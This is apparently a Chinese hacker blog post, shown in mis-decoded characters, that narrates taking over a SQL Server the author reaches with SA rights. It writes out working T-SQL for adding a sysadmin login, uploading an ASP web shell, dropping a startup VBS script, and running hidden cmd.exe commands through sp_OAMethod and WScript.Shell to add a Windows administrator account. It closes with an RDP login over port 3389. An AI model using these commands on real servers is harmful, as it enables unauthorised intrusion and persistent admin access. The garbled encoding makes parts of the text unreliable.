朋友叫我?guī)兔纯矗@樣和管理員的直接攻防較量我還沒(méi)嘗試過(guò)，所以也就答應(yīng)了！
　　因?yàn)槭菙?shù)據(jù)庫(kù)是SA權(quán)限連接的，我首先想到的是利用下面的命令：
exec master.dbo.sp_addlogin renwoxin
我的目的是添加數(shù)據(jù)庫(kù)用戶(hù)“renwoxin”，然后將將其加入“Sysadmin”組：
Exec master.dbo.sp_addsrvrolemember renwoxin,sysadmin
然后就可以用祭出我們的“屠庫(kù)寶刀”——SQL查詢(xún)分析器了。開(kāi)始我還抱著一絲僥幸，希望可以通過(guò)：
sp_addextendedproc Xp_cmdshell,@dllname='Xplog70.dll'
添加X(jué)p_cmdshell擴(kuò)展過(guò)程?？上QL輸出如下：
數(shù)據(jù)庫(kù)中已存在名為Xp_cmdshell 的對(duì)象。
為了確認(rèn)Xp_cmdshell是否被刪除我提交如下語(yǔ)句：
select count(*) from master.dbo.sysobjects where xtype='X' and name=Xp_cmdshell
返回1，看來(lái)并未刪除Xp_cmdshell對(duì)象，那問(wèn)題應(yīng)該是出在Xplog70.dll這個(gè)文件了，也許被改名或者刪除了。
我決定用臭要飯的寫(xiě)的GetWebShell來(lái)寫(xiě)入ASP木馬。工具使用很簡(jiǎn)單，以往的黑防也有介紹過(guò)。我使用后一會(huì)兒就提示寫(xiě)入成功了，但等我高高興興的去訪(fǎng)問(wèn)這個(gè)路徑時(shí)，卻提示“找不到網(wǎng)頁(yè)”，郁悶！
　　百思不得其解，拿出NBSI2，利用Tree list工具列出WEB路徑下的文件，發(fā)現(xiàn)上傳的木馬“安詳”地躺在那兒，可為什么不能訪(fǎng)問(wèn)呢（我現(xiàn)在都還不知道答案，哪位高人知道希望能指點(diǎn)一下），而且錯(cuò)誤提示居然是“找不到文件”？！
我打算放棄了，可這么好的肉雞就這么飛了，實(shí)在心有不甘！到百度一通狂搜，終于找到一篇文章，文中提出了一種方法，用SQL查詢(xún)分析器寫(xiě)入如下指令：
Declare @o int, @f int, @t int, @ret int ,@a int
exec sp_oacreate ’scripting.filesystemobject’, @o out
——這兩行代碼是建立SQL的文本對(duì)象
exec sp_oamethod @o, ’createtextfile’, @f out,’c:\docume~1\alluse~1\「開(kāi)始」菜單\程序\啟動(dòng)\a.vbs’, 1
－－在啟動(dòng)菜單里寫(xiě)入a.vbs，當(dāng)然這里只支持中文
exec @ret = sp_oamethod @f, ’writeline’, NULL,’set wshshell=createobject("wscript.shell")’
——單引號(hào)里的都是a.vbs的內(nèi)容，要一行一行的寫(xiě)，下同。
exec @ret = sp_oamethod @f, ’writeline’, NULL,’a=wshshell.run ("cmd.exe /c net user user1 123 /add",0)’
exec @ret = sp_oamethod @f, ’writeline’, NULL,’b=wshshell.run ("cmd.exe /c net localgroup administrators user1 /add",0)’
－－a.vbs內(nèi)容結(jié)束
按照作者的說(shuō)法，執(zhí)行查循后會(huì)在服務(wù)器的啟動(dòng)程序里寫(xiě)入一個(gè)a.vbs腳本。等服務(wù)器重啟就可以添加一個(gè)user1密碼為123的用戶(hù)?？墒且确?wù)器重啟，要到哪一天啊?!
對(duì)著這段代碼是我是上看、下看、左看、右看，你還別說(shuō)真看出點(diǎn)什么了。這個(gè)腳本用Sp_oamethod來(lái)調(diào)用OLE對(duì)象的Writeline方法，突然靈光一閃，我能不能用Sp_oamethod來(lái)執(zhí)行CMD命令呢？趕緊找出“SQL Server聯(lián)機(jī)叢書(shū)”，其中對(duì)Sp_OAMethod描述如下：
sp_OAMethod
調(diào)用 OLE 對(duì)象的方法。
語(yǔ)法
sp_OAMethod objecttoken,
????methodname
????[, returnvalue OUTPUT]
????[ , [ @parametername = ] parameter [ OUTPUT ]
????[...n]]
參數(shù)
objecttoken
是先前用 sp_OACreate 創(chuàng)建的 OLE 對(duì)象令牌。
methodname
是要調(diào)用的 OLE 對(duì)象的方法名。
用WScript.Shell對(duì)象的Run方法來(lái)運(yùn)行Cmd.exe不就可以執(zhí)行Cmd命令了嗎？于是構(gòu)造如下語(yǔ)句：
DECLARE @cmd INT
EXEC sp_oacreate 'wscript.shell',@cmd output
EXEC sp_oamethod @cmd,'run',null,'cmd.exe /c net user renwoxin$ test /add','0','true'

小提示：上面語(yǔ)句的詳細(xì)解釋是：
用Sp_OACreate創(chuàng)建OLE 對(duì)象Wscript.Shell的令牌。
用Sp_oamethod調(diào)用Wscript.Shell的Run方法來(lái)執(zhí)行CMD語(yǔ)句，添加用戶(hù)renwoxin$，密碼為test。“0”和“true”是RUN方法的參數(shù)：“0”可選。表示程序窗口外觀(guān)的整數(shù)值，表示語(yǔ)句執(zhí)行時(shí)隱藏CMD窗口，如果不加的話(huà)，在服務(wù)器上會(huì)有一個(gè)DOS窗口閃一下，容易暴露；“true”可選。布爾值，表示在繼續(xù)執(zhí)行腳本中的下一條語(yǔ)句之前，腳本是否等待執(zhí)行完程序。如果設(shè)為T(mén)rue，則在執(zhí)行完程序后才執(zhí)行腳本，RUN方法返回由程序返回的任何錯(cuò)誤代碼。如果設(shè)為False（默認(rèn)值），則RUN方法將自動(dòng)在啟動(dòng)程序后立即返回0（不是錯(cuò)誤代碼）。

上面的代碼執(zhí)行后，SQL查詢(xún)分析器返回一個(gè)0值，這表示執(zhí)行成功了，再將renwoxin$提升為管理員：
DECLARE @cmd INT
EXEC sp_oacreate 'wscript.shell',@cmd output
EXEC sp_oamethod @cmd,'run',null,'cmd.exe /c net localgroup administrators renwoxin$ /add','0','true'
這次又返回一個(gè)0值，還等什么，趕快從3389連過(guò)去看看，順利進(jìn)入！大家肯定會(huì)想到這個(gè)RUN可以執(zhí)行幾乎所有的CMD命令，只是如果你要看到結(jié)果，就需要自己構(gòu)造表來(lái)存儲(chǔ)了，大家可以發(fā)揮自己的想象力了！
找到SQL安裝目錄下的Binn文件夾，發(fā)現(xiàn)其中的Xplog70.dll果然被刪除了。再檢查一下，用GetWebShell提交的ASP木馬，內(nèi)容居然是亂碼！反正是不能執(zhí)行，到現(xiàn)在我還是想不通是為什么，希望大俠們能著文傳授。到此文章也該結(jié)束了，希望能盡快看到大俠們的文章。

最新評(píng)論